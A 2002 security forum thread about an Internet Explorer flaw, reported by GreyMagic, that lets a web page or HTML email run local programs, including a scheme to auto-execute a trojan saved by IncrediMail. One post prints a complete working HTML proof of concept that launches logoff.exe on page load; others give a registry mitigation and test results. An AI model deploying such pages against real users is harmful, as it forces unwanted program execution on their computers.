New MSIE Vulnerability - Remote Access
Results 1 to 6 of 6

Thread: New MSIE Vulnerability - Remote Access

  1. #1
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Exclamation New MSIE Vulnerability - Remote Access

    A Microsoft Internet Explorer vulnerability was found by GreyMagic
    (http://security.greymagic.com/adv/gm001-ie/). With IncrediMail, it's
    possible to gain a remote access on a computer.


    Incredimail save automatically email attachements in this directory
    (on Windows 2000 Professionnal) :
    C:Program
    FilesIncrediMailDataIdentities{42D00B20-479C-11d4-9706- 00105A40931C}Message
    StoreAttachments

    So if you send an html email with the GreyMagic vulnerability and a
    trojan in attachments, it will be save in this directory.

    The html mail contains this code :






    ]]>




    So, the trojan is executed automatically.

  2. #2
    Demonstration:
    simple
    advanced

    Solution: There is no configuration-tweaking workaround for this bug, it will work as long as the browser parses HTML. The only possible solution must come in the form of a patch from Microsoft.
    Update - 3 Mar 2002

    Since the injected <object> runs in the "My Computer" Zone changing the Internet Zone's settings didn't affect it, but changing the correct zone's settings will prevent this exploit from running.
    Here is the registry information:

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
    Change the value of "1004" (DWORD) to 0x3.
    Tested on: IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.
    IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.
    IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.
    IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.

    Taken from here.

    Remote_Access_

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Posts
    742
    A more mean code then the above example.. Once you visit the homepage your computer will loggof the current user.. Norton AV did find and identify the above but did not succed to detect and stop this piece of code .

    Source and example of the code can be found here --> http://www.****.org/~max/xp_rules.jpg (beware visiting this webpage can logg you out of the computer).

    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML>
    <HEAD>
    <TITLE>IE6 security...</TITLE>
    
    <META http-equiv=Content-Type content="text/html; charset=windows-1252">
    <SCRIPT language=JScript>
    
    var programName=new Array(
    	'c:/windows/system32/logoff.exe',
    	'c:/winxp/system32/logoff.exe',
    	'c:/winnt/system32/logoff.exe'
    );
    
    function Init(){
    	var oPopup=window.createPopup();
    	var oPopBody=oPopup.document.body;
    	var n,html='';
    	for(n=0;n<programName.length;n++)
    		html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
    	oPopBody.innerHTML=html;
    	oPopup.show(290, 390, 200, 200, document.body);
    }
    
    </SCRIPT>
    </head>
    <BODY onload="Init()">
    You should feel lucky if you dont have XP right now.
    </BODY>
    </HTML>

  4. #4
    Senior Member
    Join Date
    Feb 2002
    Posts
    253
    I ran the GreyMagic test on the following:

    IE6.0, Win98, all patches, Scriptblocking enabled
    IE5.5, sp/2, Win98se, Spriptblocking enabled
    IE5.5, sp/1, Win98, Scriptblocking enabled
    The code attempted to run in each case but NAV 7.0 (2001) stopped the exploit each time.
    BTW, Norton Personal Firewall did *nothing*.

  5. #5
    Senior Member
    Join Date
    Sep 2001
    Posts
    118
    Kinda goes to show, you really shouldn't integrate a browser with the Operating System so closely. Modularity is security, in this case--visiting a page with any of the above code will not harm Netscape, for instance, because it is not integrated with the operating system.

    Of course, none of the above exploits had any effect on Opera 5, for RedHat 7.1 ;-)
    Got Root?



    This user powered by Linux.

  6. #6
    Senior Member
    Join Date
    Feb 2002
    Posts
    253
    KublaiKhan wrote:

    "Of course, none of the above exploits had any effect on Opera 5, for RedHat 7.1 ;-)"

    Neither of the above exploits had any effect on OffByOne ver.3.2G, Win98. :-)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •